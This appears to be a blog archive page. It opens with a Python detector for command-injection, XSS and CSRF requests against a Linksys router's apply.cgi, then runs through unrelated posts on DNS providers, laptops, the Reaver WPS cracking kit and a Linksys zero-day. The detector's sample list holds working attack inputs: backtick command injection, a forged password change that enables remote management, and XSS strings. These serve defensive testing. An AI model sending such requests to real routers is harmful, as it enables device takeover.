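# Characters a POSIX shell interprets; a hostname never needs any of them.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\s]")
# Assumption: wan_hostname is a single DNS label (the domain goes in wan_domain).
HOSTNAME_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")
# submit_button carries a page name (index, Management, Wireless_Basic, Filters).
PAGE_NAME = re.compile(r"[A-Za-z0-9_]+")
# Characters that let a value break out of an HTML attribute or a JS string.
MARKUP_META = re.compile(r"[<>\"']")


def parse_request(method, target, body=""):
    """Return (path, params) for a request; params come from the query
    string for GET and from the urlencoded body otherwise."""
    parts = urlsplit(target)
    raw = parts.query if method.upper() == "GET" else body
    params = parse_qs(raw, keep_blank_values=True)
    # If a parameter is repeated, keep the last occurrence.
    return parts.path, {k: v[-1] for k, v in params.items()}


def inspect_request(method, target, body=""):
    """Return a list of finding tags for one apply.cgi request."""
    path, p = parse_request(method, target, body)
    if not path.endswith("/apply.cgi"):
        return []
    findings = []

    # OS command injection: wan_hostname must be a plain hostname label.
    host = p.get("wan_hostname", "")
    if host:
        if SHELL_META.search(host):
            findings.append("cmd-injection:wan_hostname")
        elif not HOSTNAME_LABEL.fullmatch(host):
            findings.append("invalid:wan_hostname")

    # Reflected XSS: submit_button should match the page-name allowlist.
    if "submit_button" in p and not PAGE_NAME.fullmatch(p["submit_button"]):
        findings.append("xss:submit_button")

    # Stored XSS: markup metacharacters in the policy name.
    if MARKUP_META.search(p.get("f_name", "")):
        findings.append("xss:f_name")

    # Password change, and remote management switched on in the same request.
    if p.get("PasswdModify") == "1":
        findings.append("password-change")
        if p.get("remote_management") == "1":
            findings.append("remote-mgmt-enabled")

    # Settings applied via GET can be triggered by a link or image tag (CSRF).
    if method.upper() == "GET" and p.get("action") == "Apply":
        findings.append("state-change-via-get")
    return findings


# (method, target, body): shortened from the requests on this page,
# except the last entry, which is a constructed benign request.
SAMPLES = [
    ("POST", "/apply.cgi",
     "submit_button=index&action=Apply&router_name=test"
     "&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test"),
    ("GET", "/apply.cgi?submit_button=index&action=Apply&router_name=test"
     "&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test", ""),
    ("GET", "/apply.cgi?submit_button=Management&action=Apply&PasswdModify=1"
     "&http_passwd=pwnd1&http_passwdConfirm=pwnd1&remote_management=1"
     "&http_wanport=8080", ""),
    ("POST", "/apply.cgi",
     "submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply"
     "&wl_net_mode=mixed&wl_ssid=test"),
    ("GET", '/apply.cgi?submit_button=Filters&submit_type=save&action=Apply'
     '&f_id=1&f_name=123">&f_status2=allow', ""),
    ("POST", "/apply.cgi",
     "submit_button=index&action=Apply&wan_hostname=router-1&wan_domain=test"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        tags = inspect_request(method, target, body)
        print(method, target[:40], "->", tags or "clean")
```

A legitimate policy name containing an apostrophe would also be tagged `xss:f_name`, so treat that tag as a prompt to review the request rather than as proof.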



Is Using OpenDNS/Google DNS a Bad Idea?

Think you're getting faster performance by using Google DNS or OpenDNS? Think again -- especially if you're outside the US.

A post at TUAW today recommends you change your DNS provider for faster performance. If you are located outside the US -- like I am, and like most APC readers are -- this is a bad idea. I only discovered why after experiencing slow download speeds for several months.


Like other tech enthusiasts, I jumped on the opportunity to switch my computer's domain name server settings away from my ISP's defaults to -- I assumed -- the much larger and faster Google DNS servers at 8.8.8.8 and 8.8.4.4 when they were first announced.

If you're not familiar with what exactly DNS servers do, they translate the web address you type into your browser into the actual IP address of the internet server you're connecting to at the other end. For example, a DNS server will convert "apcmag.com" typed into your browser address bar into "125.7.5.1", which is the IP address of our server at Macquarie Telecom's datacentre.

DNS servers can be one cause (among many) of slowness in your web browsing, if your ISP's DNS server is overloaded and responding slowly -- you may experience a delay of seconds each time you go to a web address that your computer hasn't seen recently (and therefore has to connect to a DNS server to find out the correlating IP address).

This is one of the problems that third-party public DNS providers like Google DNS and OpenDNS are supposed to fix -- faster, more reliable lookups.

However, it was Simon Hackett, CEO of Internode, who I bumped into at a function who warned me off using third party DNS servers located overseas, such as Google DNS or OpenDNS. (By the way, if I've got any of the technical details wrong in this article, it's much more likely to be my fault than Simon's...!)

The key reason they're bad is that they stuff up your computer's ability to find the closest Akamai server to you. Akamai is the worldwide system which places massive file servers inside ISP data centres worldwide -- so that when you download a big file like a Windows or Mac OS X update, or a TV show or movie from iTunes, it downloads from a server that's very close to you, and therefore pumps down your line as fast as your ADSL2+ can handle. (The primary selling point of Akamai is that it avoids server overload when everyone tries to download something at once, but a secondary selling point is that you're downloading a file from a local server inside your ISP or at least in your country, so that the trip between the file server and you is as short/fast as possible.)

If you use a US-based DNS server, your closest Akamai cache will instead be chosen as being in the US, and you'll get crummy download speeds as your file trickles over the international link.

In my case, this meant that iTunes downloads were coming down at a couple of hundred kilobytes per second, rather than the 1.9MB/s I was accustomed to before I changed my DNS servers to Google DNS and OpenDNS.

Don't get me wrong -- there are some distinct advantages to using reliable servers from companies that specialise in providing DNS, like much faster refresh of their DNS records when new domains are registered, or websites change their IP addresses, DNS-level blocking of known phishing sites and so on.

But when they claim you'll get faster speed by using them, they're conveniently forgetting to mention that if you're not located in the US, they could badly slow down your speed when downloading from distributed caches like Akamai.

Admittedly, part of the problem is the design of Akamai -- it is, to an extent, a 'hack' of the DNS system (not in the illegal sense; but in the sense that they're using the DNS system in a way it was not quite designed for initially.) I have contacted Akamai's senior PR people twice and asked if they're investigating any way of mitigating the problem when people use DNS servers outside their local geography, but I haven't heard back.

Of course, if Google DNS, OpenDNS or other public DNS providers put servers into Australia, the problem would be largely gone. But until they do, my advice is to stick with the DNS provided by your ISP. To their credit, OpenDNS is reasonably up-front about this problem (though it's not something they advertise on their homepage, so most users wouldn't be aware of it.)

UPDATE: Phil Sweeney from Whirlpool reminded me that using a third-party DNS service can also screw up your ISP's quota free downloads. For example, iiNet provides unmetered downloads from Apple's iTunes Store, which is great if you like to buy TV series and rent/buy movies on iTunes. However, if you change your DNS to OpenDNS or Google DNS, you'll be pulling the content from an Akamai server overseas, rather than the one in iiNet's network that is designated for free downloads. As a result, you will be charged for those downloads. - source

IdeaPad Yoga 13 Specs


Specification:

Description Yoga 13
CPU
  • 3rd generation Intel® Core™ i7-3517U
  • 3rd generation Intel® Core™ i5-3317U
  • 3rd generation Intel® Core™ i3-3217U
Operating System
  • Windows 8 Pro
  • Windows 8
Memory
  • 4GB, 8GB DDR3
Graphics
  • Intel® HD Graphics 4000 (integrated)
Dimensions
  • 333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Camera
  • 1.0MP 720p HD integrated webcam
Display
  • 13.3" HD+IPS capacitive multitouch display (16:9 widescreen) (1600x900)
Weight
  • 1.54 kg (3.4 lbs)
I/O Ports
  • 1 USB 2.0 port
  • 1 USB 3.0 port
  • Combo jack
  • HDMI
  • 2-in-1 card reader (SD/MMC)
Storage
  • 128GB SSD (256GB coming soon)
Wireless Connectivity
  • 802.11 b/g/n wireless
  • Bluetooth®
Keyboard
  • AccuType keyboard
Battery Life
  • 8 hours
Security Features
  • OneKey® Recovery

Google Public DNS A Closer View

Earlier this month, Google announced that it had become the largest public DNS service in the world, handling an average of more than 70 billion requests a day. From Google’s point of view, this was great. As it pointed out in its official blog, a good DNS service helps make the Web faster and more secure. That’s true. But is a giant DNS in Google’s hands really good for the world?


The DNS or Domain Name System is often described as the “phone book” of the Internet, but that analogy tends to understate its importance. Imagine that you’ve suddenly landed in the middle of a giant megalopolis without any street names or building addresses or distinguishing characteristics and no working GPS. That would be the Internet without a domain name system.

But while the DNS system is critical for planetary communications, helping to run it typically hasn’t brought anyone power or glory. This led to a certain amount of neglect, which in turn created a business opportunity for companies willing to tackle the job of improving DNS.

Three years ago, I sat down with David Ulevitch, a developer who founded OpenDNS in 2005 to help make the Internet faster and more reliable for individuals and businesses by providing a better domain name service. At the time, OpenDNS had built a small but profitable business providing improved DNS for free to individuals and for a fee to enterprises. It later grew to operate the largest network of public DNS servers, serving millions of users around the world.

Unlike Google, Ulevitch has never struck me as being obsessed with world domination, so I reached out to him this week to ask what he thought of Google’s entry, and now colossal presence, in the space.

What are the implications of Google being the largest public DNS service? Is this good for ordinary people who use the Internet?

First, I think it’s a clear indication that Google takes DNS seriously. I’ve always said that Google’s purview is limited to everything between the user and the advertisement. DNS fits squarely within those sights and cuts across a number of strategic areas of focus for Google—speed, security, analytics and control. I think efforts to make the Internet faster are good for ordinary people, but I think that there’s more to Google’s motives than pure benevolence. That’s not to say good can’t be a byproduct, but rather, there are ancillary benefits that may not be as friendly to the ordinary Internet user.

With DNS, it’s possible to control key components of Internet navigation. Google already controls search, they are quickly gaining market share to control the browser, and when you put in DNS, it becomes the trifecta of complete navigational control. The “omnibox” is something Google introduced with Chrome, but I actually introduced it to Google PM Sundar Pichai a number of years before Chrome existed when demoing our vision for OpenDNS to him as he was then the PM for Google Toolbar, and other Google desktop products.

What role has Google played in the DNS ecosystem? Do you see them as a competitor or a partner?

Google has helped raise the importance of DNS above the network engineering community, which has been really good. They’ve also worked with us to advance the state of the art for DNS performance, something we’ve really enjoyed working with them to make happen. It’s not so much competition as it is choice in the market. If they started defaulting Chrome to use Google DNS, I think that’s something we would take issue with, but for now, we like the idea of people using a DNS other than their ISPs, that’s a good idea for a lot of reasons.

What are some of those reasons?

I like the idea of separation of services. ISPs provide a pipe. Other vendors provide security. Other vendors provide email. When one party controls all the services, it’s a “synergy” for the company, but rarely for the consumer. With DNS in particular, there are performance and security benefits that third party DNS providers offer that ISPs aren’t incentivized to do since DNS is a cost-center for them, and a profit-center for us.

Are there any privacy concerns to think about if you configure your network settings to use Google Public DNS?

You are trusting them with all your DNS lookup data, which can be more personal and revealing than I think most people realize. We don’t persist logs for our users without accounts and configured networks, I’m not sure Google makes the same statement. They have a separate privacy policy for Google DNS, and I’m sure they are hypersensitive about privacy concerns, so I wouldn’t be too paranoid.

If an ordinary person using the Web doesn’t make this change, would they have any exposure to Google Public DNS?

Probably not. OpenDNS is in 10's of 1000's of public hotspots, retail stores, schools, and businesses, so people often find our service. I’m not sure about Google DNS in that capacity.

If Google is the largest public DNS, who is the largest private DNS?

An ISP—maybe Comcast? I’m not sure. Google claims the most number of queries per day, but we actively discourage automated usage of OpenDNS by machines, crawlers and other software. Google doesn’t. I’m not sure they have more end users than we have. We are still growing at an aggressive clip.

Anonymous has publicly posted its threat to take down the Internet on March 31 by attacking the 13 DNS root servers of the Internet. Do you take this threat seriously?

Anonymous is nothing and everything at the same time. While I think it’d be very difficult to take down the root servers on the Internet, I think it’s entirely possible to cause massive disruption to the Internet in other ways if someone was focused on doing that. The Internet is always getting more secure, and more diversely connected, but there are some weak links still where a specific outage in a specific place would have far-reaching disruptive implications.

Does the presence of players like OpenDNS and Google Public DNS make the Internet more stable?

I think anything which promotes heterogeneity on the Internet promotes stability. Diversity in services, service providers, and separating the layers of the networking stack are all important. Your ISP no longer provides you email because everyone either uses their own or has an account with Hotmail, Gmail or Yahoo mail. The same way people unbundled their email from their ISP, I think they should do with their DNS. Separation of services has been a long-standing best practice in the security community, and it applies now more than ever. In that vein, I’ll reiterate my view that I think Google controlling search, the browser, and the network or DNS layer is a dangerous trifecta that the consumer will probably be best served avoiding. I’m sure we’ll find out soon enough. - source

LG: Google Nexus 4 at $200 Limited Supply

Google made a bold move late last year by announcing its flagship Nexus smartphone for an unsubsidized price starting at $300. That's a big deal when comparable devices are selling for twice as much and the upfront cost for most last generation phones with a two year contract is only slightly cheaper at $200. But ultimately Google failed to deliver -- both figuratively and literally -- as it missed shipping deadlines and had to pull the device from sale due to problems with supplies.


Last month, the company pinned the blame on "scarce and erratic" supplies from manufacturer LG, while also admitting that their communication had been flawed.

But LG has a different story to tell. In an interview with French website Challenges, Cathy Robin, director LG Mobile France said they built precisely the number of phones that Google requested, it's just that the Internet giant's sales forecasts were wildly inaccurate. Estimates were based on sales of the Samsung-made Galaxy Nexus, which meant there were too few handsets available and too many shipped to the wrong regions.

Robin noted that despite the setbacks, the partnership between Google and LG is still going well, and in fact they expect to ramp up production of the Nexus 4 by mid-February to address the shortage.

Last week, LG's senior vice president James Fisher also said that the Nexus 4 was "the first of many" products the Korean firm had planned with Google, sparking rumors that the firm could be in charge of its successor. - source

Lenovo ThinkPad X230 Review


September 19, 2012: The ThinkPad is to personal computing what polka dots are to fashion – it’s a classic. Originally an IBM product, and taken over by Lenovo about seven years ago, the concept and construct of a ThinkPad has changed little over the years. The Japanese Bento-box inspired design remains largely unchanged with tweaks made only to improve ergonomics or adapt to new screen sizes.

Design details

We got our hands on one of the new-age ThinkPads, the Lenovo X230. While retaining its executive-like all-black look, this ThinkPad is designed to be lightweight and compact to meet the needs of an increasingly mobile lifestyle.


In a market where thinner is apparently better, the 1-inch plus girth of the Lenovo X230 seems like an aberration. However, Lenovo manages to pack all of it in about 1.5 kgs, an easily portable bulk. The build quality is sturdy with a magnesium roll cage housing the tech inside and a soft rubberised panel on the body which keeps scratches away.

The 12.5-inch screen is an IPS display, which means readability/visibility was excellent at all times. The viewing angles too were better than the usual fare. We watched ‘Before Sunrise’, the 1995 romantic classic and although we had to use it with external speakers, the video experience was quite good.


The creators of the ThinkPad, and the engineers who have carried the company’s legacy on, have always paid an uncommon amount of attention to the device’s keypad. Although it’s one of the most used components of any personal computing device, users seldom prioritise a genuinely ergonomic keypad over more aesthetic features when going for a laptop. However, for someone who hasn’t used a ThinkPad keyboard before, the typing hardware is quite a pleasant revelation. The island-type keyboard seems to have been spaced at just the right distance, with the keyboard depressed just a little bit so your fingers’ natural curve finds the right fit every time you hit a key.

The space bar also doubled up as a function key for an overhead lamp that highlights the keyboard. A simple addition but extremely useful considering how many times we fumble around in the dark when trying to tweak volume or pause in the middle of a movie we might be watching before going off to bed.

Targeted at the business traveller, the X230 has been made ready for video and voice conferencing with a dual-array noise cancelling microphone that keeps ambient noise at a minimum. During conference calls or video chats, you can even choose to mute the sound of keys being typed on your keyboard for a clearer conversation. The webcam is a high-definition 720p HD camera which has face tracking enabled.

A device aimed at the business traveller needs to be equipped with the latest connectivity options. The ThinkPad X230 hence comes with three USB ports (2 x USB 3.0), a memory card reader, Gigabit Ethernet port, VGA and Mini DisplayPort outputs and an Express Card slot.

Multimedia


The ThinkPad X230 is equipped with Dolby speakers with Advanced Audio v2. However, the audio experience on the laptop was definitely not one of the best we’ve come across. Most times the volume on the speakers was too feeble and the audio had little impact. Hence, we inevitably had to plug in the headphones while watching a movie or sitcom.

Our ThinkPad X230 review unit operates on Microsoft Windows 7 Professional and is powered by an Intel Core i5 3210M with an over clocking speed of 2.5GHz.

We ran our regular Novabench test on the Lenovo X230 and it scored about 676 points shooting way ahead of a bunch of Ultrabooks and laptops we had reviewed in the last couple of months, including the Dell Inspiron 17R Special Edition and the Acer Aspire TimelineUltra M5; the only exception being the Dell XPS 14z which we reviewed earlier this year.

Like most other manufacturers there’s a bit of bloatware that comes with Lenovo ThinkPad X230, the only good thing is you might actually be able to use this software regularly. You’ll find programs such as Evernote, Google Chrome, Skype etc on board already. With the screen dimmed and constant Wi-Fi connectivity the Lenovo ThinkPad X230 gave us close to six hours of email and media usage.

Crafted as a modern, compact device to be carried along for presentations or business trips, the Lenovo ThinkPad X230 does the job efficiently. For those who might want to replace say an older version of a ThinkPad, the X230 is a decent option, unless you are saving up for slimmer devices such as the Carbon X1. For those who are considering buying their first ThinkPad, the X230 competes well when it comes to productivity with its competitors in the market. - source

Jan 20, 2013

LaVie World’s Lightest Ultrabook

How light would you like your Ultrabook? If even 3 pounds seems too heavy to you, try packing the 13.3-inch NEC LaVie Z, which weighs a paper-light 1.9 pounds. We had a chance to go hands-on with the svelte system here at Intel’s Developer Forum and we just couldn’t believe how light it felt in our hands.


At just .59-inches thick, the LaVie Z is also one of the thinnest notebooks on the market. Despite the thinness, we were pleased to see that the Ultrabook, which is made from a lightweight lithium-magnesium alloy, has room for several ports including an SD card reader, two USB ports (one of which is USB 3.0) and a full-size HDMI port. We wish there was an Ethernet port, but you can’t have everything on a system this light.


The 13.3-inch screen touts a respectable resolution of 1600 x 900 which, in our brief hands-on, made images fairly sharp, but colors were not particularly vibrant and the viewing angles on this glossy screen seemed poor as a lot of light reflected off its surface. Even at maximum brightness, the display did not seem particularly bright to us, but to be fair, the notebook was on display in an area of the convention center with a lot of sunlight coming in and hitting its surface.

The LaVie Z’s keyboard has some awkward key sizes and placements, with a tiny undersized right Shift key that sits to the right of the up arrow key, a giant rectangular Enter key that looks like it belongs on an old-school typewriter and a tiny square backspace key. When we pressed the keys they seemed a bit shallow but not overly stiff or mushy. The small, matte touch pad appeared reasonably accurate in our use.


However, the most impressive feature of the NEC LaVie Z is clearly its lightweight chassis. While we normally have difficulty holding a notebook by its deck with just one hand, we were able to hold up the LaVie Z with our left, non-dominant hand while filming with our right. Better still, the Ultrabook did not feel creaky or loosely constructed even when we held it this way.


Though it is made for the Japanese market where it was released in August, Dynamism is now selling the LaVie Z to U.S. consumers for $1,799 with a 1.9-GHz Intel 3rd Generation Core i7 CPU, 4GB of RAM and a 256GB SSD. - source

Reaver Pro Tool Kit

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.


WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Current attacks against WPA networks involve the computation of rainbow tables based on a dictionary of potential keys and the name (SSID) of the network being attacked. Rainbow tables must be re-generated for each network encountered and are only successful if the PSK is a dictionary word. However, Reaver is not restricted by the limitations of traditional dictionary-based attacks. Reaver is able to extract the WPA PSK from the access point within 4 - 10 hours and roughly 95% of modern consumer-grade access points ship with WPS enabled by default.

Get Reaver Pro

You can find the free, open source version of Reaver at Google Code

Tactical Network Solutions is now pleased to offer a commercial version of Reaver called Reaver Pro. Reaver Pro is a dedicated hardware kit that allows operators to effortlessly conduct WPS attacks via a graphical web interface. The hardware is preconfigured and tested for field use; operators only have to plug it in and start the attack. Simply connect the bootable USB and provided wireless card into a laptop and boot to the Reaver Pro distribution. Browse to the localhost in a web browser, and select the network you want to attack. It's that easy!

The Reaver Pro kit comes with:
  • Tactical Network Solutions USB drive with bootable Reaver Pro distribution
  • Tactical Network Solutions USB radio
  • Reaver Pro Users Guide (8 pages)
  • High gain 5dBi Antenna
  • Micro USB Cable
Via Reaver Pro

Jan 19, 2013

Linksys routers vulnerable to zero-day exploit

A zero-day vulnerability has been discovered in popular Cisco Linksys routers that allows hackers to gain remote root access. Security vendor DefenseCode discovered the flaw and reported it to Cisco months ago and a fix is already on the way.


According to Cisco, more than 70 million Linksys routers have been sold globally. This exploit was successfully tested against a Linksys model WRT54GL router by researchers at security firm DefenseCode who claimed that the latest Linksys firmware 4.30.14 and all previous versions are still vulnerable.

It took the team only 12 days to develop an exploit that could be used by hackers to take control of a person’s wireless router and hijack all the information being processed through it.

The vulnerability is demonstrated in the following video:

Jan 18, 2013

Chic Blogger of the Week


Today I just wanted to feature this chic; her name is Dovy, whom I stumbled upon at bloggers.com. She looks so cool. A simple girl but sexy and gorgeous. Unfortunately, she was in Melaka at that time while I was in Port Dickson. Untimely, I will be in Langkawi soon while she is heading to Pangkor Island. Wish to meet her soon at KLCC. lol!


Netsys 980000N 150Mbps USB Dual Antenna


The Netsys 980000N is based on the Ralink RT3070 chipset, with a USB 2.0 interface that is backward compatible with USB 1.1. It is equipped with two detachable 9dBi RP-SMA antennas and claims a 4200 milliwatt power output. It is a traditional draft 802.11n adapter that also supports b/g.

Specifications:
  • Model: Netsys 980000N
  • Power: 4200mW
  • Chipset: Ralink RT3070
  • Security: WEP 64/128, WPA, WPA-PSK, WPA II
  • USB 2.0/1.1 compliant
  • Frequency range: 2.4~2.4835GHz
  • Dual 9dBi antenna
  • Sensitivity: -65dBm at 130Mbps/-74dBm at 54Mbps/-84dBm at 11Mbps
  • Modulation: OFDM/CCK/BPSK/QPSK
  • Antenna type: 2 x RP-SMA connector
  • Supports Windows 7/2000/XP/Vista/Linux/Mac OS
  • Package includes:
      • 1 x Network adapter
      • 1 x USB cable
      • 1 x Software CD
      • 1 x Chinese manual



CD-R King CW300UB 300Mbps USB Dual Antenna


The CD-R King CW300UB is a 300Mbps 802.11n/b/g USB wireless adapter with dual antennas. It is actually just a clone of the Comfast, Edup, Kinamax and other adapters, rebadged under a different brand name. If you look at the specification, the casing and so on, it is identical to those mentioned above, except for the name, which is CD-R King here in the Philippines.


Specifications:
  • CPU: Ralink RT3072
  • Standard: IEEE802.11b, IEEE802.11g, IEEE802.11n(2.0), IEEE802.11e (WMM), I, f and h standards, IEEE802.1x
  • Physical Interface: USB 1.1 / 2.0
  • Operating Voltage: 5V
  • Antenna: SMA2dBi antenna (2T2R)
  • LED Status: Link Activity & PWR
  • Frequency Band: 2.400-2.484GHz
  • Modulation Technology: OFDM: BPSK: QPSK, 16-QAM, 64-QAM, DBPSK, DQPSK, CCK
Receive Sensitivity
  • 2.412-2.472G(IEEE802.11b): Optimal -90dBm @ 1Mbps
  • 2.412-2.472G(IEEE802.11g): Optimal -89dBm
  • 2.412-2.472G(IEEE802.11N):Optimal -89dBm
Transmit Power
  • 2.412-2.472G(IEEE802.11b): Up to 20dBm
  • 2.412-2.472G(IEEE802.11g): Up to 15dBm
  • 2.412-2.472G(IEEE802.11N): Up to 15dBm
  • Support WEP, WPA/ WPA2 (AES /TKIP), WPS, WMM
  • Support any common operating system including the Windows 2000/ XP/ VISTA / CE/ 7/ MAC/ LINUX